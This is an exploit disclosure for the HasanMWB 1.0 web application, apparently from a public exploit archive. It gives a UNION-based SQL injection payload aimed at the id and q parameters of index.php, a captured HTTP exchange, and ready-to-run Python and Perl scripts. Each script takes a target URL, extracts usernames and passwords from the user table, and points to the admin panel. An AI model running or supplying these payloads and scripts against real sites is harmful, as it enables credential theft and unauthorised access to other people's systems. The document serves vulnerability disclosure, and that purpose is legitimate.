HasanMWB 1.0 - SQL Injection
2018-12-05 10:36:56# Exploit Title: HasanMWB 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-12-05
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/hasanmwb/
# Software Link: https://netcologne.dl.sourceforge.net/project/hasanmwb/HasanMWB-v1.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
#GET /PATH/index.php?hsn=category&id=11' union select 1,(SELECT GROUP_CONCAT(0x3c68323e,0x557365723a,username,0x2020,0x506173733a,password,0x3c2f68323e SEPARATOR 0x3c62723e) FROM user),3,4-- - HTTP/1.1
#Host: TARGET
#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
#Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
#Accept-Language: en-US,en;q=0.5
#Accept-Encoding: gzip, deflate
#Cookie: PHPSESSID=5lk3medj631el6lb4e77ereee5; 786e332ae62061df5c64a17076aef3ee=0li10seku22m9qr31rr8avemn2
#DNT: 1
#Connection: keep-alive
#Upgrade-Insecure-Requests: 1
#HTTP/1.1 200 OK
#Date: Wed, 05 Dec 2018 00:24:09 GMT
#Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
#X-Powered-By: PHP/5.6.30
#Expires: Thu, 19 Nov 1981 08:52:00 GMT
#Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
#Pragma: no-cache
#Content-Length: 2697
#Keep-Alive: timeout=5, max=100
#Connection: Keep-Alive
#Content-Type: text/html; charset=UTF-8
# POC:
# 1)
#index.php?hsn=page&id=[SQL] / $id = $_GET['id'];
#index.php?hsn=category&id=[SQL] / $id = $_GET['id'];
#index.php?hsn=search&q=[SQL] / $qu = $_GET['q'];
# Etc..
#!/usr/bin/python
import urllib2
import re
print """
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo----
HasanMWB 1.0 - SQL Injection
Ihsan Sencan
---------------Ooooo----
( )
ooooO ) /
( ) (_/
\ (
\_)
"""
s = raw_input("\nTarget:[http://localhost/[PATH]/] ")
e = ("index.php?hsn=category&id=1")
p = ("1' union select 1,(SELECT GROUP_CONCAT(0x3c68323e,0x557365723a,username,0x2020,0x506173733a,password,0x3c2f68323e SEPARATOR 0x3c62723e) FROM user),3,4-- -")
response = urllib2.urlopen(s+e+p)
c = response.read()
up = re.findall(r'<h2>(.*)</h2>', c)
print "Server: ", response.info()['server']
print (up)
print "Login Url:"+(s)+"panel.php"
#!/usr/bin/perl
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "**************************\n";
print "HasanMWB 1.0 SQL Injection\n";
print "Ihsan Sencan\n";
print "**************************\n";
use LWP::UserAgent;
print "\nTarget:[http://localhost/[PATH]/] ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress...\n";
print "\n";
$E="/index.php?hsn=category&id=1' union select 1,(SELECT GROUP_CONCAT(0x3c68323e,0x557365723a,username,0x2020,0x506173733a,password,0x3c2f68323e SEPARATOR 0x3c62723e) FROM user),3,4-- -";
$cc = LWP::UserAgent->new() or die "Could not initialize browser\n";
$cc->agent('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0');
$host = $target . "".$E."";
$res = $cc->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/<h2>(.*?)<\/h2>/){
print "[+] Success !!!\n";
print "\n[+] Detail : $1\n";
print "$target/panel.php";
print "\n";
}
else{print "\n[-]Not found.\n";
}
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.